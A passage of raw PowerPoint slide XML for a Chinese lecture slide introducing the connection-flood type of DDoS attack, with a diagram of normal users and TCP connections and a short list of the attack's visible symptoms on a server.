            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2122488" y="1671638"/>
            <a:ext cx="2089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600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>大量</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18441" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FFF3256-19FF-4B7D-98C3-0D87398E3DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="1941513"/>
            <a:ext cx="1368425" cy="842962"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1008" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195617" name="AutoShape 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C5DCD73-91E0-438E-89BF-6DADCEB21415}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1008" cy="864"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -43750"/>
                <a:gd name="adj2" fmla="val 70000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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618" name="Text Box 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DBD94F3-7320-4B03-9A1E-3C75EB9CCAF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="95" y="192"/>
              <a:ext cx="721"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这么多？</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18444" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C1334D-B2F3-4B38-B3F0-5045BC151571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1822450" y="4767263"/>
            <a:ext cx="2160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不能建立正常的连接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195591" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3E8297-B190-4BED-94C4-2E4269C046AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315913" y="174625"/>
            <a:ext cx="7861300" cy="503238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>DDoS攻击介绍——Connection Flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="195592" name="Picture 17" descr="j0301260">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E9E425-688E-4279-9B7A-DBBBBA126492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3609975"/>
            <a:ext cx="1238250" cy="1065213"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18446" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2549571-3007-481A-8121-B68EBB67CD60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1906588" y="1958975"/>
            <a:ext cx="2303462" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195615" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4876FB80-0BCE-400E-A749-69B11B13B7AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>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616" name="Text Box 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1FB3CB-43DC-4ECF-9056-20CF6995B030}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="335" y="144"/>
              <a:ext cx="190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正常</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195594" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD08F982-4F90-47D6-BD77-BA1C44917187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="4775200"/>
            <a:ext cx="1008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正常用户</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195595" name="AutoShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A53C3B89-BD86-4702-984E-093D8EF3C23B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="3975100"/>
            <a:ext cx="2160588" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 101578"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0000FF"/>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596" name="Text Box 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75BFAFB6-23EA-444D-9CE9-A709349B15ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="4133850"/>
            <a:ext cx="1652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600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="18453" name="AutoShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B14B960-FED5-4C34-BCC0-AB720F01DE00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2525713" y="4044950"/>
            <a:ext cx="506412" cy="50323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cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195598" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4A8E02E-FA90-4F55-93BE-F87E518B1E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5953125" y="1125538"/>
            <a:ext cx="3011488"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攻击表象</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18455" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F4241D6-A8E2-4C7E-9335-9259E0CE9B9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1906588" y="2174875"/>
            <a:ext cx="2303462" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195613" name="AutoShape 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E674DF-61C7-4161-AE28-DBE8555A3074}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>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614" name="Text Box 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C074018A-C7DF-4067-9F7D-3B9BCA509499}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="335" y="144"/>
              <a:ext cx="190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正常</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18458" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F372D9C9-52C5-4C20-8638-46FC780C0368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1914525" y="2462213"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195611" name="AutoShape 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34134497-9B82-4B14-B486-C22EA9207722}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>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612" name="Text Box 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597F8CB4-BB8B-4857-AD46-D4F17778C9FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="335" y="144"/>
              <a:ext cx="190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正常</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18461" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39BBB9D4-851D-48B4-8B95-B8260F7233F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1906588" y="2679700"/>
            <a:ext cx="2303462" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195609" name="AutoShape 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5AFD110-D9D0-4098-9C5B-A203215016DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>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610" name="Text Box 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABAFBE7E-1CED-4364-B292-83BF494C2E9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="335" y="144"/>
              <a:ext cx="190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正常</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18464" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099C0901-48D5-4E0F-B568-20F3B0D43E2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1906588" y="2895600"/>
            <a:ext cx="2303462" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195607" name="AutoShape 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A037A489-3FFC-4054-830D-7E3BD122AA93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2496" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 118182"/>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5608" name="Text Box 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F759BC27-8AC1-4F8F-BB48-FCEA6CA3385A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="335" y="144"/>
              <a:ext cx="1906" cy="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正常</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>tcp connect</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195603" name="Line 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C9A54F0-981B-42A1-9101-E23B714E4207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5651500" y="1341438"/>
            <a:ext cx="0" cy="5224462"/>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5604" name="Line 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090E18BD-2049-4950-9AEF-7FE6A368647C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5651500" y="1341438"/>
            <a:ext cx="179388" cy="15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5605" name="Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB453B18-A0F3-4EF6-A728-C19DAC6B3381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="1628775"/>
            <a:ext cx="3097212"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ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 利用真实 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址（代理服务器、广告页面）在服务器上建立大量连接</a:t>
            </a:r>
          </a:p>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ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 服务器上残余连接</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(WAIT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>状态</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>过多，效率降低，甚至资源耗尽，无法响应</a:t>
            </a:r>
          </a:p>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ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 蠕虫传播过程中会出现大量源</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址相同的包，对于 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
